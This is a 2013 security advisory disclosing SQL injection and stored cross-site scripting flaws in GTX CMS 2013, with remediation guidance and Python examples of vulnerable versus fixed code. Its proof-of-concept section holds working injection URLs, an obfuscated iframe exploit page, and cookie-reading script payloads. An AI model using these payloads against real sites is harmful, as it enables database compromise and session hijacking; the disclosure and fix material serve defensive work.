Document Title:
===============
GTX CMS 2013 Optima - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1124


Release Date:
=============
2013-10-29


Vulnerability Laboratory ID (VL-ID):
====================================
1124


Common Vulnerability Scoring System:
====================================
7.2


Product & Service Introduction:
===============================
We provide you with the perfect community GTX CMS software solution - making it ready to meet your needs and
requirements and tailored to your corporate design! The complete setup of your individual interactive community
portal or your website is done by us, so you can get started right away!

GTX CMS is extremely flexible and can be operated as a closed community (e.g. parallel to your existing website)
and as a normal website with a closed member area. For details, refer to the section `About GTX CMS`.

(Copy of the Vendor Homepage: http://www.gtx-cms.de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official GTX Content Management System 2013 web application.


Vulnerability Disclosure Timeline:
==================================
2013-10-29: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
OBM-Media e.K.
Product: GTX CMS - Web Application Basic, Standard and Optima


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
Multiple remote SQL injection web vulnerabilities were detected in the official GTX Content Management System 2013 web application.
The vulnerabilities allow remote attackers to inject their own SQL commands without authorization and to compromise the web
application or the web server's DBMS.

The SQL injection vulnerabilities are located in the `objId` and `modId` values of the tagSearchTag module. Remote attackers are able
to inject their own SQL commands via a GET request to compromise the database management system or the CMS web application. The
injection can be done through the executable Ajax path via a GET request, or through the objId value in the tagSearchTag module's
POST request. The severity of the remote SQL injection bugs is estimated as high.

Exploitation of the remote SQL injection vulnerabilities requires no user interaction and only a low-privileged web-application
user account. Successful exploitation results in compromise of the database management system and of the CMS or web application.


Vulnerable Module(s):
[+] ajax

Vulnerable File(s):
[+] tagSearchTag

Vulnerable Parameter(s):
[+] objId
[+] modId


1.2
Multiple persistent input validation web vulnerabilities were detected in the official GTX Content Management System 2013 web application.
The vulnerabilities allow remote attackers to inject, via POST requests, their own malicious script code into the application side of
the online service.

The first persistent input validation vulnerability is located in the Ajax `tagSearchTag` module and the connected vulnerable `q`
parameter. Remote attackers are able to inject their own malicious script code as a tag name. The code executes in the main
communication module when a user or admin reviews the article or the comments. Exploitation requires a low-privileged
web-application user account and only low user interaction (view, no click!).

The second persistent vulnerability is located in the `linkverzeichnis` (link directory) add module. Remote attackers are able to
inject their own malicious script code as `Schlüsselwörter` (keywords) that are later displayed in the search. The code executes in
the main link directory module of the web application. Exploitation requires a low-privileged web-application user account and low
or medium user interaction (click!).

The third persistent vulnerability is located in the `Ordnerverwaltung` (folder/path management) module. Remote attackers are able
to manipulate the vulnerable `ordner` (folder) name value in the add POST request. The code executes in the main path of the
`persoenliche nachrichten` (private messages) module in the CMS control panel. Exploitation requires a low-privileged
web-application user account and medium user interaction (add+click!).

Successful exploitation of these vulnerabilities leads to persistent session hijacking (customers), account theft via persistent
web attacks, persistent phishing, persistent redirects to external sources, persistent redirects to file downloads, or persistent
manipulation of the affected and connected context.


Vulnerable Module(s):
[+] ajax/tagSearchTag
[+] suche/linkverzeichnis
[+] pers-nachrichten/ordnerverwaltung

Vulnerable Input(s):
[+] Tags
[+] Suche - Linkverzeichnis > Schlüsselwörter - Suchbegriff(e) & Entfernung von
[+] Ordnerverwaltung - Add

Vulnerable Parameter(s):
[+] q
[+] keywords
[+] ordner


Proof of Concept (PoC):
=======================
1.1
The SQL injection web vulnerabilities can be exploited by remote attackers with a low-privileged web application user account and
without user interaction. For demonstration or to reproduce ...

PoC:
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL INJECTION VULNERABILITY!]--
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL INJECTION VULNERABILITY!]--&objId=3


Exploit:
<script type="text/javascript">document.write(unescape("<script type=\"text\/javascript\
">document.write\(unescape\(\"%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EGTX%20CMS%20-
%20SQL%20INJECTION%20EXPLOIT%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//gtx.localhost
%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId%3Dptd%26objId%3D37_%2520%27null
%5BSQL%20INJECTION%20VULNERABILITY%21%5D--%20width%3D%22800%22%20height%3D%22800%22%3E%0A%3C
iframe%20src%3Dhttp%3A//gtx.localhost%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId
%3Dptd%2520%27null%5BSQL%20INJECTION%20VULNERABILITY%21%5D--%20width%3D%22800%22%20height%3D
%22800%22%3E%26objId%3Dx%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E%0A%0A\"\)\);<\/script>"));</script>



1.2
The persistent input validation web vulnerabilities can be exploited by remote attackers with low-privileged web application user
accounts and low user interaction. For demonstration or to reproduce ...


1.2.1

PoC: Tags in Article or News
<div class="right">
<div id="tagTagsWidget">
<ul class="as-selections" id="as-selections-049"><li class="as-selection-item blur"
id="as-selection-002"><a class="as-close">×</a>>"<iframe src="GTX-CMS.de%20%20Mitglieder-
Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20
geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm"></iframe></li><li class="as-original"
id="as-original-049"><input autocomplete="off" name="tags" id="as-input-049" class="text as-input" type="text">
<input value=">"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"
<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>,>"
<iframe src=http://vuln-lab.com>," class="as-values" name="as_values_049" id="as-values-049" type="hidden"></li></ul>
<div style="display: none;" class="as-results" id="as-results-049"></div>
</div>


Inject: Tags
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen

PoC (PATH):
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null



1.2.2

PoC: Suchbegriff(e) & Entfernung von

<div class="box">
<div class="formItems">
<div class="item row1">
<div class="left">
Schlüsselwörter</div><div class="right">>"<iframe src="GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,
%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20
Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm" onload="alert(document.cookie)" <="" div="">
</div>
</div>
</div>


Inject: Suchbegriff(e) & Entfernung von
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen

Output:
Suche - Linkverzeichnis > Schlüsselwörter
http://gtx-cms.localhost:8080/suche/linkverzeichnis



1.2.3

PoC: Ordnerverwaltung - Ordner Name

<li class="seperator"></li>
<!-- Users folders -->
<li><a class="icon" href="/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie-
iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1">
<img src="images/icons/Sophistique/files_24.png" alt="Ordner">
<span>>"<iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <="
%20%20.">"<iframe src=http://vuln-lab.com onload=alert(document.cookie) < (0)</span>
</a></li>


Inject: Ordnerverwaltung Add
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung

Output: Persönliche Nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung


Solution - Fix & Patch:
=======================
1.1
The SQL injection web vulnerabilities can be patched by securely parsing and encoding the vulnerable `modId` and `objId` values in
the tag search module: validate each value against the type it is expected to be (a short alphanumeric module code and a numeric
object id) and pass it to the database through a prepared statement instead of building the query string from the request values.
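To make the difference concrete, here is an added example (Python with the standard sqlite3 module; not GTX CMS code, whose language and schema the advisory does not show) with a tag lookup written the way the advisory describes, next to the fixed version. The table layout, column names and sample rows are constructed. The payloads are taken from the PoC section: the advisory-style `37_ 'null--` value, which breaks the statement and surfaces a database error, and a plain tautology in the same parameter, which returns rows the requesting user should never see.

```python
import re
import sqlite3

# Constructed stand-in for the CMS tag table; the advisory does not show the
# real GTX CMS schema, so table and column names here are assumptions.
def make_db():
    db = sqlite3.connect(':memory:')
    db.executescript("""
        CREATE TABLE tags (id INTEGER PRIMARY KEY, mod_id TEXT, obj_id INTEGER, name TEXT);
        INSERT INTO tags (mod_id, obj_id, name) VALUES
            ('ptd', 37, 'golf'), ('ptd', 37, 'tennis'), ('ptd', 3, 'golf'), ('lnk', 37, 'verein');
    """)
    return db


def tag_search_vulnerable(db, q, mod_id, obj_id):
    """Query assembled from the request values by string formatting (the flaw the advisory describes)."""
    sql = ("SELECT name FROM tags WHERE mod_id = '%s' AND obj_id = '%s' AND name LIKE '%%%s%%'"
           % (mod_id, obj_id, q))
    return [row[0] for row in db.execute(sql)]


MODID_RE = re.compile(r'[a-z0-9_]{1,16}')
OBJID_RE = re.compile(r'[0-9]{1,10}')


def tag_search_fixed(db, q, mod_id, obj_id):
    """Check each value against its expected type, then bind it as a parameter."""
    if not MODID_RE.fullmatch(mod_id):
        raise ValueError('modId must be a short alphanumeric module code')
    if not OBJID_RE.fullmatch(obj_id):
        raise ValueError('objId must be a non-negative integer')
    # LIKE wildcards inside q are escaped so the search term is matched literally.
    pattern = '%' + q.replace('\\', '\\\\').replace('%', '\\%').replace('_', '\\_') + '%'
    sql = "SELECT name FROM tags WHERE mod_id = ? AND obj_id = ? AND name LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, (mod_id, int(obj_id), pattern))]


def demo():
    """Run a benign request and the two payloads against both handlers; return the outcomes."""
    db = make_db()
    out = {}
    out['vuln_benign'] = tag_search_vulnerable(db, 'golf', 'ptd', '37')
    # tautology in objId: the comment hides the rest of the WHERE clause, every row comes back
    out['vuln_tautology'] = sorted(tag_search_vulnerable(db, 'golf', 'ptd', "37' OR 1=1 --"))
    # the advisory-style value: the stray quote breaks the statement and leaks a DB error
    try:
        tag_search_vulnerable(db, 'x', 'ptd', "37_ 'null--")
        out['vuln_advisory'] = 'no error'
    except sqlite3.OperationalError as err:
        out['vuln_advisory'] = 'sql error: ' + str(err)
    out['fixed_benign'] = tag_search_fixed(db, 'golf', 'ptd', '37')
    try:
        tag_search_fixed(db, 'golf', 'ptd', "37' OR 1=1 --")
        out['fixed_tautology'] = 'accepted'
    except ValueError:
        out['fixed_tautology'] = 'rejected'
    # the same tautology placed in q is harmless: it is bound as a literal search term
    out['fixed_q_payload'] = tag_search_fixed(db, "37' OR 1=1 --", 'ptd', '37')
    return out


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, '->', value)
```

Note that `q` is not restricted to a pattern: a tag name legitimately contains arbitrary text, so it is bound as a parameter and only its LIKE wildcards are escaped. The error raised by the advisory-style payload is the reason an unauthenticated scanner can confirm the flaw; a production handler should catch database errors and return a generic response instead of echoing them.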

1.2
The persistent input validation web vulnerabilities can be patched by securely parsing and encoding the vulnerable ordner name,
q and keywords parameters. Encode the output of the ordner name in the private messages box and connected resources, and encode
the tag search output, including its error output, before it is written into the page, to prevent script code execution.
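The PoC output in 1.2.3 shows the two sinks side by side: the folder name is reduced to a slug in the `href`, but written unencoded into the `<span>`. The following is an added example for this page, not GTX CMS code. It renders that folder entry and the tag widget's hidden `as_values` input with the payloads from the PoC section, once unencoded (reproducing the vulnerable output) and once with `html.escape` applied at the output sink. The slug rule and the exact markup are assumptions modelled on the snippets above.

```python
import html
import re

# Folder-name payload as shown in the PoC output of section 1.2.3
FOLDER_PAYLOAD = '>"<iframe src=http://vuln-lab.com onload=alert(document.cookie) <'
# Tag payload as shown in the PoC of section 1.2.1
TAG_PAYLOAD = '>"<iframe src=http://vuln-lab.com>'


def slugify(name):
    """Reduce a folder name to [a-z0-9-] for the /pers-nachrichten/ordner/<slug> path.
    The CMS evidently does something similar for the href; the exact rule is an assumption."""
    slug = re.sub(r'[^a-z0-9]+', '-', name.lower()).strip('-')
    return slug or 'ordner'


FOLDER_TEMPLATE = ('<li><a class="icon" href="/pers-nachrichten/ordner/%s_%d">'
                   '<img src="images/icons/Sophistique/files_24.png" alt="Ordner">'
                   '<span>%s (0)</span></a></li>')


def render_folder_vulnerable(name, index=1):
    """Writes the raw name into the span, which is what the PoC output shows."""
    return FOLDER_TEMPLATE % (slugify(name), index, name)


def render_folder_fixed(name, index=1):
    """Same markup, but the name is HTML-escaped (quotes included) at the output sink."""
    return FOLDER_TEMPLATE % (slugify(name), index, html.escape(name, quote=True))


def render_tag_values_fixed(tags):
    """Hidden as_values input of the tag widget with every stored tag escaped for an attribute."""
    joined = ','.join(tags)
    return ('<input value="%s" class="as-values" name="as_values_049" '
            'id="as-values-049" type="hidden">' % html.escape(joined, quote=True))


if __name__ == '__main__':
    print(render_folder_vulnerable(FOLDER_PAYLOAD))
    print(render_folder_fixed(FOLDER_PAYLOAD))
    print(render_tag_values_fixed(['golf', TAG_PAYLOAD]))
```

Escaping with `quote=True` matters for the tag widget: its value lands inside a double-quoted attribute, and the payload in 1.2.1 begins with `>"` precisely to close that attribute and the tag. Escaping at the sink, rather than filtering on input, also covers the stored values that are already in the database.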


Security Risk:
==============
1.1
The security risk of the remote SQL injection web vulnerabilities is estimated as high(+).

1.2
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com